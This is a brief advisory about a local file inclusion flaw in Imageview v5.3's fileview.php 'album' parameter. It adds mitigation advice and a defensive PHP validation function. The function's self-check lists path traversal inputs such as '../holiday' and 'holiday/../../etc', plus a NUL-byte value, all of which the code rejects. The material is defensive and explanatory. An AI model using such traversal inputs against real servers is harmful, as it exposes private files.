Vendor: Imageview
By: DNX
CVSS: 7.5 (HIGH)
Local File Inclusion
CWE: 22
Product Name: Imageview
Affected Version From: Imageview v5.3
Affected Version To: Imageview v5.3
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Imageview v5.3 (fileview.php) Local File Inclusion
The vulnerability exists in the fileview.php script of Imageview v5.3 and can be exploited when the magic_quotes_gpc setting is turned off. The script does not properly sanitize the user-supplied 'album' parameter before using it in a require() call. An attacker can exploit this to include arbitrary local files and potentially execute malicious code.
Mitigation:
To mitigate this vulnerability, users are advised to install Imageview version 6 or enable the magic_quotes_gpc setting.
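One way to validate the 'album' value in code before it reaches require(), rather than depending on magic_quotes_gpc (a setting removed in PHP 5.4). This is an added example, not Imageview's source: the function name, the albums directory layout and the album.php file name are assumptions.

```php
<?php
// Added example: hypothetical names throughout, not Imageview's source.

/**
 * Resolve a user-supplied album name to a file inside $albumRoot,
 * or return null when the name is not acceptable.
 */
function resolve_album_file(string $albumRoot, $album, string $file = 'album.php'): ?string
{
    // 1. Allowlist the name: letters, digits, '_' and '-' only. This rejects
    //    path separators, "..", NUL bytes and arrays (?album[]=x) in one check.
    if (!is_string($album) || preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $album) !== 1) {
        return null;
    }

    // 2. Canonicalise and confirm the result is still under the album root
    //    (covers symlinks placed inside the albums directory).
    $root = realpath($albumRoot);
    $path = realpath($albumRoot . DIRECTORY_SEPARATOR . $album . DIRECTORY_SEPARATOR . $file);
    if ($root === false || $path === false) {
        return null;
    }
    if (strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Self-check on a constructed directory tree (sample inputs are constructed).
$root = sys_get_temp_dir() . '/albums_' . bin2hex(random_bytes(4));
mkdir($root . '/holiday', 0700, true);
file_put_contents($root . '/holiday/album.php', "<?php return ['title' => 'Holiday'];");

$samples = ['holiday', '../holiday', 'holiday/../../etc', "holiday\0", ['holiday'], 'missing'];
foreach ($samples as $s) {
    $resolved = resolve_album_file($root, $s);
    printf("%-24s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES), $resolved === null ? 'rejected' : 'accepted');
}

// Only a validated, canonical path ever reaches require().
$path = resolve_album_file($root, $_GET['album'] ?? 'holiday');
if ($path === null) {
    http_response_code(400);
    exit("Invalid album\n");
}
$album = require $path;
echo $album['title'], "\n";
```

Run from the command line, only the first sample is accepted; every other input is rejected before any file is opened.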